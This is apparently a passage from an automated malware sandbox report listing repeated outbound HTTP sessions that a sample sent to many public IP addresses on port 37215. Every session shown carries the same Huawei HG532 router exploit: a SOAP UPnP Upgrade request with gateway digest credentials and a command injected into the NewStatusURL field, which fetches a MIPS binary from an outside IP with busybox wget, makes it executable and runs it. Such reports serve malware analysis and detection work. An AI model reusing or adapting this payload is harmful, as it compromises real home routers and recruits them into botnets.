39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            705192.168.2.1356504197.126.48.11637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.667443037 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            706192.168.2.1336132197.46.18.4237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.669182062 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            707192.168.2.1345274156.196.121.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.671087027 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            708192.168.2.1338730197.176.219.21937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.672215939 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            709192.168.2.1338196197.217.153.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.673516989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            710192.168.2.1354890197.224.191.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.674619913 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            711192.168.2.133381441.205.27.22237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.675728083 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            712192.168.2.1345284156.224.70.8637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.677115917 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            713192.168.2.135530841.184.163.17237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.679363966 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            714192.168.2.133990241.164.87.11537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.680397987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            715192.168.2.133532841.9.208.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.681566954 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
